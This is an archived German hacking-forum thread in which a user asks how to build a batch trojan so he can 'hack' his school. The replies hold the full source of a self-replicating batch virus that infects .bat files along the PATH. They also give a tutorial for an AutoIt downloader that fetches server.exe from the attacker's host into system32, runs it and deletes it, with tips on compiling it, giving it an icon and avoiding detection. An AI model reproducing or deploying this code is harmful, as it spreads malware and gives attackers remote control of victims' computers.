PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [BAT]Trojaner



HaXx
03.04.2009, 11:59
Kann man villeicht so eine .bat datei erstellen wo automatisch wenn man drauf drückt sich der server von mir loadet?
Gibt es eine lösung will schule hacken

Sn0opY
03.04.2009, 12:01
warum ne bat 0.o
da kannste doch glei die .exe raufhaun oder n downloader
du kannst mit ner bat ne page aufrufen z.b. nen rs link aber das muss man dann runterladen und ausführen da wäre ja schwachsinn kannste auch gleich ne exe ausführen

sp1nny
03.04.2009, 12:09
Mach das doch in VB das sind vielleicht 10 Zeilen oder so. ^^

HaXx
03.04.2009, 20:07
sp1nny wenn du mir hilfst
Ich möchte ne bat von daher weil ne .bat nicht als Virus erkannt wird

Zylasty
03.04.2009, 20:14
klar wird ne .bat als virus erkannt ?!
noch nie was von batch viren gehört?
hier ein beispiel


@echo off>nul.ViRuS
rem ViRuS The BatchViRuS by Dirk van Deun 1994
rem ViRuS May be copied freely (On your own machine !)
rem ViRuS Programmed to prove that it's possible
rem ViRuS (and to show off skill in writing batchfiles)
rem ViRuS If you have no disk cache, you're not interested ;-)
rem ViRuS E-mail hw41652@vub.ac.be

rem ViRuS Known bug: interpretation of variables may make lines too long
rem ViRuS for DOS and let characters drop off: unpredictable behaviour

if "%0==" echo --------------------------------------->con.ViRuS
if "%0==" echo | Hi ! I am the nice BatchViRuS ! |
if "%0==" echo --------------------------------------->con.ViRuS
if "%0==" goto ViRuS_OLDBAT
if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply
if "%1=="/ViRuS_PARSEPATH goto ViRuS_parsepath
if "%1=="/ViRuS_FINDSELF goto ViRuS_findself
if "%VOFF%=="T goto ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat command /e:10000 /c %0 /ViRuS_FINDSELF %path%
if not exist %0.bat call xViRuSx
if not exist %0.bat del xViRuSx.bat
if not exist %ViRuSname%.bat set ViRuSname=
if "%ViRuSname%==" goto ViRuS_OLDBAT

rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)
rem ViRuS or if environment is too small to contain %ViRuSname% !

if "%VPATH%==" set VPATH=%PATH%>nul.ViRuS
rem (if environment cannot hold VPATH, ViRuS will function partially)
command /e:10000 /c %0 /ViRuS_PARSEPATH %VPATH%
call xViRuSx
del xViRuSx.bat
if "%VPATH%==" set VPATH=.>nul.ViRuS
set ViRuSname=
goto ViRuS_OLDBAT

:ViRuS_findself
if "%2==" echo.>xViRuSx.bat
if "%2==" exit>nul.ViRuS
if exist %2\%ViRuSname%.bat echo set ViRuSname=%2\%ViRuSname%>xViRuSx.bat
if exist %2\%ViRuSname%.bat exit
if exist %2%ViRuSname%.bat echo set ViRuSname=%2%ViRuSname%>xViRuSx.bat
if exist %2%ViRuSname%.bat exit
shift>nul.ViRuS
goto ViRuS_findself

:ViRuS_parsepath
for %%a in (%2\*.bat;%2*.bat) do command /e:10000 /c %ViRuSname% /ViRuS_MULTIPLY %%a
for %%a in (%2\*.bat;%2*.bat) do goto ViRuS_new_vpath
shift>nul.ViRuS
if not "%2==" goto ViRuS_parsepath
if not "%1==". for %%a in (.\*.bat) do command /e:10000 /c %ViRuSname% /ViRuS_MULTIPLY %%a
:ViRuS_new_vpath
set VPATH=%3>nul.ViRuS
:ViRuS_loop
shift>nul.ViRuS
if "%3==" echo set VPATH=%VPATH%>xViRuSx.bat
if "%3==" exit>nul.ViRuS
set VPATH=%VPATH%;%3>nul.ViRuS
goto ViRuS_loop

:ViRuS_multiply
echo Checking: %2>con.ViRuS
find "SeT IchBin=%%0" <%2>xViRuSx.bat
call xViRuSx
del xViRuSx.bat
if "%IchBin%=="xViRuSx exit
find "ViRuS" <%ViRuSname%.bat>xViRuSx.bat
type %2>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
echo Infecting: %2>con.ViRuS
exit>nul.ViRuS

rem data for the first find in ViRuS_multiply
SeT IchBin=%0>nul.ViRuS

:ViRuS_OLDBAT
echo on>nul.ViRuS
echo This is the dummy original batch


genausogut kannst dir nen normalen downloader holen und den crypten oder einen downloader per autoit machen!
sufu hilft!

hab mal bisschen geholfen!


####################################
####################################
## ##
## Tutorial made by DJ Serial ##
## ##
## for free-hack.com ##
## ##
####################################
####################################



Als erstes nehmt ihr die datei Downloader.au3 und öffnet sie mit dem editor.


InetGet("http://Pfad zu deiner seite und datei", "C:\WINDOWS\system32\server.exe", 1, 1);Erster Pfad ist der Datei Pfad auf eurem FTP server, wobie die datei server.exe heißen muss. Zewiter Pfad ist der Pfad wo er es abspeichern soll, bitte so lassen.
sleep(30000); gibt dem Programm 30 sec zum runterladen der Datei. Wahlweise mehr
Run("server.exe"); Führt die Datei aus.
sleep(2000); wartet 2 sec
FileDelete ( "C:\WINDOWS\system32\server.exe" );Löscht den server.

Wenn ihr dies alles in der datei Downloader.au3 geändert habt speichert ihr diese
datei und geht in den Ordner Aut2Exe.
Nun Öffnet ihr die Datei Aut2exe.exe, dort wählt ihr bei Source eure Downloader.au3
datei aus und bei Destination einen belibigen Pfad zum speichern.
Bei Custom Icon könnt ihr noch ein Icon auswählen, habe nur ein paar beigelegt.
Dann nehmt ihr noch den hacken bei Allow decompilation weg und klickt oben auf Compression
und entfernt den Hacken bei UPX Compress .exe stub.
Dann auf Convert und schwups habt ihr euren Privaten downloader.
aber den download link für autoit musst dir schon selber ergooglen!